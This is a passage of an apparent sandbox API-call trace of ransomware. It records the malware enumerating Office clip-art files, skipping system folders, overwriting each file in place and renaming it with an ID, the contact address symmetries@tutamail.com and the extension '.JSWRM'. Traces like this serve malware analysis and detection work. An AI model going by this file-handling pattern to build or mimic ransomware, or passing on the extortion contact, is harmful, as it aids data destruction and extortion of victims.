lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE01172_.WMF", cAlternateFileName="")) returned 1 [0093.042] lstrcmpiW (lpString1="PE01172_.WMF", lpString2=".") returned 1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="..") returned 1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="...") returned 1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="windows") returned -1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="recovery") returned -1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="perflogs") returned -1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="documents and settings") returned 1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="system volume information") returned -1 [0093.043] lstrcmpiW (lpString1="PE01172_.WMF", lpString2="msocache") returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01172_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01172_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.044] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1436) returned 1 [0093.044] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x590) returned 0x2332c0 [0093.044] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x590, lpOverlapped=0x0) returned 1 [0093.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.046] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x590, lpOverlapped=0x0) returned 1 [0093.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0093.046] CloseHandle (hObject=0x314) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0093.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.047] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f9c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE01191_.WMF", cAlternateFileName="")) returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2=".") returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="..") returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="...") returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="windows") returned -1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="recovery") returned -1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="perflogs") returned -1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="documents and settings") returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="system volume information") returned -1 [0093.047] lstrcmpiW (lpString1="PE01191_.WMF", lpString2="msocache") returned 1 [0093.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01191_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01191_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.048] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16284) returned 1 [0093.048] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f90) returned 0x24d210 [0093.049] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3f90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3f90, lpOverlapped=0x0) returned 1 [0093.051] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.051] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3f90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3f90, lpOverlapped=0x0) returned 1 [0093.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.052] CloseHandle (hObject=0x314) returned 1 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0093.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0093.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0093.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0093.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.052] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0093.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1418, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE01661_.WMF", cAlternateFileName="")) returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2=".") returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="..") returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="...") returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="windows") returned -1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="recovery") returned -1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="perflogs") returned -1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="documents and settings") returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="system volume information") returned -1 [0093.053] lstrcmpiW (lpString1="PE01661_.WMF", lpString2="msocache") returned 1 [0093.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01661_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01661_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01661_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01661_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01661_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01661_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0093.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.055] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5144) returned 1 [0093.055] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1410) returned 0x205850 [0093.055] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1410, lpOverlapped=0x0) returned 1 [0093.056] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.056] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1410, lpOverlapped=0x0) returned 1 [0093.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.057] CloseHandle (hObject=0x314) returned 1 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0093.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0093.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0093.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0093.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.057] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0093.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0093.058] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE01797_.WMF", cAlternateFileName="")) returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2=".") returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="..") returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="...") returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="windows") returned -1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="recovery") returned -1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="perflogs") returned -1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="documents and settings") returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="system volume information") returned -1 [0093.058] lstrcmpiW (lpString1="PE01797_.WMF", lpString2="msocache") returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01797_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01797_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01797_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.058] 